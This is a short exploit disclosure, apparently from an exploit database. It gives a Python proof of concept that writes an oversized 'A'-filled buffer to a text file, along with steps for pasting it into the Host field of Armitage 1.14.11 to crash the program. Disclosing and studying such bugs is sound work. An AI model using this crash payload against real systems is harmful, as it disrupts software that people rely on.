# Exploit Title: Armitage - Denial of Service (PoC) # Discovery by: Mr Winst0n # Discovery Date: 2018-12-26 # Vendor Homepage: http://www.fastandeasyhacking.com/ # Software Link : http://www.fastandeasyhacking.com/download/ # Tested Version: 1.14.11 # Tested on: Kali linux # Vulnerability Type: Denial of Service (DoS) # Steps to Produce the Crash: # 1.- Run python code : python armitage.py # 2.- Open Xarmitage.txt and copy content to clipboard # 3.- Open Armitage # 4.- In the small opend window, Paste ClipBoard on "Host" and click on "Connect" # 5.- Then you will see that the program can't process the data and will crash!(after the processing operation) #!/usr/bin/env python buffer = "\x41" * 384 crash = buffer + "BBBB" + "CCCC" f = open("Xarmitage.txt", "w") f.write(crash) f.close()